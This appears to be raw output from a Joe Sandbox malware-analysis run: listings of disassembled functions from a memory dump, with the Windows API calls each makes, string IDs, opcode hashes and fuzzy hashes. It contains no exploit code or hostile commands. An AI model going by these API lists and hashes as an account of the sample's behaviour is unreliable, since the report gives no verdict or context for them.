                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000B.00000002.2323498910.0000000000261000.00000020.00000001.01000000.00000007.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                                                        • Associated: 0000000B.00000002.2323477904.0000000000260000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.00000000002FD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.0000000000323000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323595052.000000000032D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323612847.0000000000335000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_11_2_260000_Hc.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: MessageSend$CtrlParent$ClassName_wcslen
                                                                                                                                                                        • String ID: ComboBox$ListBox
                                                                                                                                                                        • API String ID: 711023334-1403004172
                                                                                                                                                                        • Opcode ID: dd55228a6294a811d76500f7a369a604b28727bfb84010597be057eebb9cf0d1
                                                                                                                                                                        • Instruction ID: d72772375b8428b6a33abdb7c8673ed88e2b4971655680efd85cd43f64ce9fba
                                                                                                                                                                        • Opcode Fuzzy Hash: dd55228a6294a811d76500f7a369a604b28727bfb84010597be057eebb9cf0d1
                                                                                                                                                                        • Instruction Fuzzy Hash: 5621CF75E10118BBCF01AFA0EC85EFEBBB9EF05350F10425AB951A7291CB755868DF60
                                                                                                                                                                        Function 002F44BF Relevance: 15.2, APIs: 10, Instructions: 182windowCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 002F4539
                                                                                                                                                                        • SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 002F453C
                                                                                                                                                                        • GetWindowLongW.USER32(?,000000F0), ref: 002F4563
                                                                                                                                                                        • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 002F4586
                                                                                                                                                                        • SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 002F45FE
                                                                                                                                                                        • SendMessageW.USER32(?,00001074,00000000,00000007), ref: 002F4648
                                                                                                                                                                        • SendMessageW.USER32(?,00001057,00000000,00000000), ref: 002F4663
                                                                                                                                                                        • SendMessageW.USER32(?,0000101D,00001004,00000000), ref: 002F467E
                                                                                                                                                                        • SendMessageW.USER32(?,0000101E,00001004,00000000), ref: 002F4692
                                                                                                                                                                        • SendMessageW.USER32(?,00001008,00000000,00000007), ref: 002F46AF
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000B.00000002.2323498910.0000000000261000.00000020.00000001.01000000.00000007.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                                                        • Associated: 0000000B.00000002.2323477904.0000000000260000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.00000000002FD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.0000000000323000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323595052.000000000032D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323612847.0000000000335000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_11_2_260000_Hc.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: MessageSend$LongWindow
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 312131281-0
                                                                                                                                                                        • Opcode ID: 854d0f079fe82a00f33e7dcdbb23750705fdef5a07413689e4f3c3bbbac38d84
                                                                                                                                                                        • Instruction ID: 2cec6c6f0fc8f905d17bced8e540fc7cf29b83c72b5a99c3d8099ddfe7abbad3
                                                                                                                                                                        • Opcode Fuzzy Hash: 854d0f079fe82a00f33e7dcdbb23750705fdef5a07413689e4f3c3bbbac38d84
                                                                                                                                                                        • Instruction Fuzzy Hash: 19618C75A00209AFDB11EFA4CC81EFEB7B8EF09750F100169FA04E72A1D7B4A965DB50
                                                                                                                                                                        Function 002CBAF6 Relevance: 15.1, APIs: 10, Instructions: 88threadCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • GetCurrentThreadId.KERNEL32 ref: 002CBB18
                                                                                                                                                                        • GetForegroundWindow.USER32(00000000,?,?,?,?,?,002CABA8,?,00000001), ref: 002CBB2C
                                                                                                                                                                        • GetWindowThreadProcessId.USER32(00000000), ref: 002CBB33
                                                                                                                                                                        • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,002CABA8,?,00000001), ref: 002CBB42
                                                                                                                                                                        • GetWindowThreadProcessId.USER32(?,00000000), ref: 002CBB54
                                                                                                                                                                        • AttachThreadInput.USER32(?,00000000,00000001,?,?,?,?,?,002CABA8,?,00000001), ref: 002CBB6D
                                                                                                                                                                        • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,002CABA8,?,00000001), ref: 002CBB7F
                                                                                                                                                                        • AttachThreadInput.USER32(00000000,00000000,?,?,?,?,?,002CABA8,?,00000001), ref: 002CBBC4
                                                                                                                                                                        • AttachThreadInput.USER32(?,?,00000000,?,?,?,?,?,002CABA8,?,00000001), ref: 002CBBD9
                                                                                                                                                                        • AttachThreadInput.USER32(00000000,?,00000000,?,?,?,?,?,002CABA8,?,00000001), ref: 002CBBE4
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000B.00000002.2323498910.0000000000261000.00000020.00000001.01000000.00000007.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                                                        • Associated: 0000000B.00000002.2323477904.0000000000260000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.00000000002FD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.0000000000323000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323595052.000000000032D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323612847.0000000000335000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_11_2_260000_Hc.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Thread$AttachInput$Window$Process$CurrentForeground
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 2156557900-0
                                                                                                                                                                        • Opcode ID: 4fb26eaf4cd3a9e811113b1062081276627c3862b87339849b6e8546a004ebe6
                                                                                                                                                                        • Instruction ID: 532ee936778adb52530294158310e2c8d73fecf2dd1c7a8a27a808c2576c7f7f
                                                                                                                                                                        • Opcode Fuzzy Hash: 4fb26eaf4cd3a9e811113b1062081276627c3862b87339849b6e8546a004ebe6
                                                                                                                                                                        • Instruction Fuzzy Hash: 8731BF79A14245AFDB169F24EDCAF79B7AEAB0436AF104119FE05D71A4C7B4AC40CF20
                                                                                                                                                                        Function 00262AB0 Relevance: 14.3, APIs: 7, Strings: 1, Instructions: 332comCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 00262AF9
                                                                                                                                                                        • OleUninitialize.OLE32(?,00000000), ref: 00262B98
                                                                                                                                                                        • UnregisterHotKey.USER32(?), ref: 00262D7D
                                                                                                                                                                        • DestroyWindow.USER32(?), ref: 002A3A1B
                                                                                                                                                                        • FreeLibrary.KERNEL32(?), ref: 002A3A80
                                                                                                                                                                        • VirtualFree.KERNEL32(?,00000000,00008000), ref: 002A3AAD
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000B.00000002.2323498910.0000000000261000.00000020.00000001.01000000.00000007.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                                                        • Associated: 0000000B.00000002.2323477904.0000000000260000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.00000000002FD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.0000000000323000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323595052.000000000032D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323612847.0000000000335000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_11_2_260000_Hc.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Free$DestroyLibrarySendStringUninitializeUnregisterVirtualWindow
                                                                                                                                                                        • String ID: close all
                                                                                                                                                                        • API String ID: 469580280-3243417748
                                                                                                                                                                        • Opcode ID: 8e5ca8060c62c64deea7164c83b40a193c9364ad12ce3403ebb2a9fe6579a34c
                                                                                                                                                                        • Instruction ID: 6ea2fccd2d69e369a46cf00ca4a2efb5215abb5b143640ab13f4b498a5bf7c00
                                                                                                                                                                        • Opcode Fuzzy Hash: 8e5ca8060c62c64deea7164c83b40a193c9364ad12ce3403ebb2a9fe6579a34c
                                                                                                                                                                        • Instruction Fuzzy Hash: 0CD18D31721622CFCB19EF14C489B29F7A1BF05754F1142AEE94AAB252CB31AD76CF50
                                                                                                                                                                        Function 002D8835 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 230COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 002D89F2
                                                                                                                                                                        • SetCurrentDirectoryW.KERNEL32(?), ref: 002D8A06
                                                                                                                                                                        • GetFileAttributesW.KERNEL32(?), ref: 002D8A30
                                                                                                                                                                        • SetFileAttributesW.KERNEL32(?,00000000), ref: 002D8A4A
                                                                                                                                                                        • SetCurrentDirectoryW.KERNEL32(?), ref: 002D8A5C
                                                                                                                                                                        • SetCurrentDirectoryW.KERNEL32(?), ref: 002D8AA5
                                                                                                                                                                        • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 002D8AF5
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000B.00000002.2323498910.0000000000261000.00000020.00000001.01000000.00000007.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                                                        • Associated: 0000000B.00000002.2323477904.0000000000260000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.00000000002FD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.0000000000323000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323595052.000000000032D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323612847.0000000000335000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_11_2_260000_Hc.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: CurrentDirectory$AttributesFile
                                                                                                                                                                        • String ID: *.*
                                                                                                                                                                        • API String ID: 769691225-438819550
                                                                                                                                                                        • Opcode ID: 08c70b7bacf3d240ed67f35d8655e2b334154e3aeed38ddc6d05e142f71d822e
                                                                                                                                                                        • Instruction ID: 66267163d142a854da13b811d978824456808d800c4f085f2ac3ff33934cb287
                                                                                                                                                                        • Opcode Fuzzy Hash: 08c70b7bacf3d240ed67f35d8655e2b334154e3aeed38ddc6d05e142f71d822e
                                                                                                                                                                        • Instruction Fuzzy Hash: AA818D729242069BCB24EF14C854ABAB3E8BB84310F54482BF8C5D7350DB75EDA5DB92
                                                                                                                                                                        Function 002F88F9 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 193windowCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • IsWindow.USER32(00000000), ref: 002F8992
                                                                                                                                                                        • IsWindowEnabled.USER32(00000000), ref: 002F899E
                                                                                                                                                                        • SendMessageW.USER32(00000000,0000041C,00000000,00000000), ref: 002F8A79
                                                                                                                                                                        • SendMessageW.USER32(00000000,000000B0,?,?), ref: 002F8AAC
                                                                                                                                                                        • IsDlgButtonChecked.USER32(?,00000000), ref: 002F8AE4
                                                                                                                                                                        • GetWindowLongW.USER32(00000000,000000EC), ref: 002F8B06
                                                                                                                                                                        • SendMessageW.USER32(?,000000A1,00000002,00000000), ref: 002F8B1E
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000B.00000002.2323498910.0000000000261000.00000020.00000001.01000000.00000007.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                                                        • Associated: 0000000B.00000002.2323477904.0000000000260000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.00000000002FD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.0000000000323000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323595052.000000000032D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323612847.0000000000335000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_11_2_260000_Hc.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: MessageSendWindow$ButtonCheckedEnabledLong
                                                                                                                                                                        • String ID: (3
                                                                                                                                                                        • API String ID: 4072528602-113007392
                                                                                                                                                                        • Opcode ID: 17bd3844b0cb4d4654994ce1e79f7ba16e1b46805b1aaa08510cb015796c3b31
                                                                                                                                                                        • Instruction ID: 5c6327851620848e837b3d95c5064d091245aeaf3d7c5afcc99ecf223695cd52
                                                                                                                                                                        • Opcode Fuzzy Hash: 17bd3844b0cb4d4654994ce1e79f7ba16e1b46805b1aaa08510cb015796c3b31
                                                                                                                                                                        • Instruction Fuzzy Hash: B471817461020EEFDB21DF54C884FBAFBB9EF09390F140469EA4597361CB71A960DB51
                                                                                                                                                                        Function 00267447 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 184windowCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • SetWindowLongW.USER32(?,000000EB), ref: 002674D7
                                                                                                                                                                          • Part of subcall function 00267567: GetClientRect.USER32(?,?), ref: 0026758D
                                                                                                                                                                          • Part of subcall function 00267567: GetWindowRect.USER32(?,?), ref: 002675CE
                                                                                                                                                                          • Part of subcall function 00267567: ScreenToClient.USER32(?,?), ref: 002675F6
                                                                                                                                                                        • GetDC.USER32 ref: 002A6083
                                                                                                                                                                        • SendMessageW.USER32(?,00000031,00000000,00000000), ref: 002A6096
                                                                                                                                                                        • SelectObject.GDI32(00000000,00000000), ref: 002A60A4
                                                                                                                                                                        • SelectObject.GDI32(00000000,00000000), ref: 002A60B9
                                                                                                                                                                        • ReleaseDC.USER32(?,00000000), ref: 002A60C1
                                                                                                                                                                        • MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 002A6152
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000B.00000002.2323498910.0000000000261000.00000020.00000001.01000000.00000007.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                                                        • Associated: 0000000B.00000002.2323477904.0000000000260000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.00000000002FD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.0000000000323000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323595052.000000000032D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323612847.0000000000335000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_11_2_260000_Hc.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
                                                                                                                                                                        • String ID: U
                                                                                                                                                                        • API String ID: 4009187628-3372436214
                                                                                                                                                                        • Opcode ID: 376489ef6a5f11e9f8ecddeaee7692e492d3afa17daa2e0fea826ca6b67d724c
                                                                                                                                                                        • Instruction ID: 010d49e83afaefd4e78a5898b8a3c01c6452b5c615bfd6804705629c4fc8d3c2
                                                                                                                                                                        • Opcode Fuzzy Hash: 376489ef6a5f11e9f8ecddeaee7692e492d3afa17daa2e0fea826ca6b67d724c
                                                                                                                                                                        • Instruction Fuzzy Hash: 1D71C431520206DFCF21DF64D88CABA7FB5FF46364F184269ED595A2A6CB3188A0DF50
                                                                                                                                                                        Function 002DCC98 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 94networkCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 002DCCB7
                                                                                                                                                                        • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 002DCCDF
                                                                                                                                                                        • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 002DCD0F
                                                                                                                                                                        • GetLastError.KERNEL32 ref: 002DCD67
                                                                                                                                                                        • SetEvent.KERNEL32(?), ref: 002DCD7B
                                                                                                                                                                        • InternetCloseHandle.WININET(00000000), ref: 002DCD86
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000B.00000002.2323498910.0000000000261000.00000020.00000001.01000000.00000007.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                                                        • Associated: 0000000B.00000002.2323477904.0000000000260000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.00000000002FD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.0000000000323000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323595052.000000000032D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323612847.0000000000335000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_11_2_260000_Hc.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: HttpInternet$CloseErrorEventHandleInfoLastOpenQueryRequestSend
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 3113390036-3916222277
                                                                                                                                                                        • Opcode ID: 9429c0371c371403a8962c7cea6342bd4c2fa8f301ac11f47875592b99d2c705
                                                                                                                                                                        • Instruction ID: bd3349d917a2beb6ca7a85d4b04047ffa3e8569712892bb6cbcce6e3c900fe03
                                                                                                                                                                        • Opcode Fuzzy Hash: 9429c0371c371403a8962c7cea6342bd4c2fa8f301ac11f47875592b99d2c705
                                                                                                                                                                        • Instruction Fuzzy Hash: D1319FB152060AAFD721AF649C88ABB7BFEEF45790B20452BF446D6310DB34ED14DB60
                                                                                                                                                                        Function 002CA215 Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 74windowCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,00000000,?,002A55AE,?,?,Bad directive syntax error,002FDCD0,00000000,00000010,?,?), ref: 002CA236
                                                                                                                                                                        • LoadStringW.USER32(00000000,?,002A55AE,?), ref: 002CA23D
                                                                                                                                                                          • Part of subcall function 0026B329: _wcslen.LIBCMT ref: 0026B333
                                                                                                                                                                        • MessageBoxW.USER32(00000000,00000001,00000001,00011010), ref: 002CA301
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000B.00000002.2323498910.0000000000261000.00000020.00000001.01000000.00000007.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                                                        • Associated: 0000000B.00000002.2323477904.0000000000260000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.00000000002FD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.0000000000323000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323595052.000000000032D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323612847.0000000000335000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_11_2_260000_Hc.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: HandleLoadMessageModuleString_wcslen
                                                                                                                                                                        • String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:
                                                                                                                                                                        • API String ID: 858772685-4153970271
                                                                                                                                                                        • Opcode ID: 5b455fe7283d1e7b6bebf95f1e4d4b6afcb1a351bc7703edd3fea47afdf5dd2e
                                                                                                                                                                        • Instruction ID: f7d727f18df2561651a87c10ca3de4dba62d1e681ca9f8e3662b272c49594ba6
                                                                                                                                                                        • Opcode Fuzzy Hash: 5b455fe7283d1e7b6bebf95f1e4d4b6afcb1a351bc7703edd3fea47afdf5dd2e
                                                                                                                                                                        • Instruction Fuzzy Hash: 7A216F3192021EEBCF02AFA0DC0AEEE7B39BF18704F004469F515A50A2EB719668DF51
                                                                                                                                                                        Function 002C29EC Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 71windowCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • GetParent.USER32 ref: 002C29F8
                                                                                                                                                                        • GetClassNameW.USER32(00000000,?,00000100), ref: 002C2A0D
                                                                                                                                                                        • SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 002C2A9A
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000B.00000002.2323498910.0000000000261000.00000020.00000001.01000000.00000007.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                                                        • Associated: 0000000B.00000002.2323477904.0000000000260000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.00000000002FD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.0000000000323000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323595052.000000000032D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323612847.0000000000335000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_11_2_260000_Hc.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: ClassMessageNameParentSend
                                                                                                                                                                        • String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
                                                                                                                                                                        • API String ID: 1290815626-3381328864
                                                                                                                                                                        • Opcode ID: 68849cbbd0cac2252d26f33332afbd6a127c2e961aab1aeb8ddfc9eefa3625a4
                                                                                                                                                                        • Instruction ID: 1088783406cbc308dca57b7b2acd39bcd692c5c8e670a8950b047be6ac9de0ab
                                                                                                                                                                        • Opcode Fuzzy Hash: 68849cbbd0cac2252d26f33332afbd6a127c2e961aab1aeb8ddfc9eefa3625a4
                                                                                                                                                                        • Instruction Fuzzy Hash: 9D11067A6A4317FAFA257721FC0BEE67BDC8F15724B20412AF904E40D1FFA168248A14
                                                                                                                                                                        Function 00267567 Relevance: 13.8, APIs: 9, Instructions: 291COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • GetClientRect.USER32(?,?), ref: 0026758D
                                                                                                                                                                        • GetWindowRect.USER32(?,?), ref: 002675CE
                                                                                                                                                                        • ScreenToClient.USER32(?,?), ref: 002675F6
                                                                                                                                                                        • GetClientRect.USER32(?,?), ref: 0026773A
                                                                                                                                                                        • GetWindowRect.USER32(?,?), ref: 0026775B
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000B.00000002.2323498910.0000000000261000.00000020.00000001.01000000.00000007.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                                                        • Associated: 0000000B.00000002.2323477904.0000000000260000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.00000000002FD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.0000000000323000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323595052.000000000032D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323612847.0000000000335000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_11_2_260000_Hc.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Rect$Client$Window$Screen
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 1296646539-0
                                                                                                                                                                        • Opcode ID: a54955fc57ea0502e4cfc1bf9ad47ca0253d4473f5b9788d58fc10575ea09b8f
                                                                                                                                                                        • Instruction ID: adfbc019fb808d9406879b3540e3cad2cc7304970924a8dec3608d93fa384b4a
                                                                                                                                                                        • Opcode Fuzzy Hash: a54955fc57ea0502e4cfc1bf9ad47ca0253d4473f5b9788d58fc10575ea09b8f
                                                                                                                                                                        • Instruction Fuzzy Hash: 4DC18C3892460ADFDB10CFA8D444BEDBBF1FF08314F14841AE895E3250DB74A9A1DB60
                                                                                                                                                                        Function 0029D210 Relevance: 13.7, APIs: 9, Instructions: 209COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000B.00000002.2323498910.0000000000261000.00000020.00000001.01000000.00000007.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                                                        • Associated: 0000000B.00000002.2323477904.0000000000260000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.00000000002FD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.0000000000323000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323595052.000000000032D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323612847.0000000000335000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_11_2_260000_Hc.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: _free$EnvironmentVariable___from_strstr_to_strchr
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 1282221369-0
                                                                                                                                                                        • Opcode ID: 7090d43e367a70e62c3a2920ca074ec4c04579e7a63d22616afe9b9d57e89bee
                                                                                                                                                                        • Instruction ID: 5c69afc7d9bc923631c5b1193a19a42c12f2f33c69c6b7f2c899765f5b7a889a
                                                                                                                                                                        • Opcode Fuzzy Hash: 7090d43e367a70e62c3a2920ca074ec4c04579e7a63d22616afe9b9d57e89bee
                                                                                                                                                                        • Instruction Fuzzy Hash: 58613B71D24302AFDF21AF74D981B7D7BA8DF02324F1401ADED44A7292D67199209F91
                                                                                                                                                                        Function 002F5B72 Relevance: 13.7, APIs: 9, Instructions: 162windowCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • SendMessageW.USER32(?,00002001,00000000,00000000), ref: 002F5C24
                                                                                                                                                                        • ShowWindow.USER32(?,00000000), ref: 002F5C65
                                                                                                                                                                        • ShowWindow.USER32(?,00000005,?,00000000), ref: 002F5C6B
                                                                                                                                                                        • SetFocus.USER32(?,?,00000005,?,00000000), ref: 002F5C6F
                                                                                                                                                                          • Part of subcall function 002F79F2: DeleteObject.GDI32(00000000), ref: 002F7A1E
                                                                                                                                                                        • GetWindowLongW.USER32(?,000000F0), ref: 002F5CAB
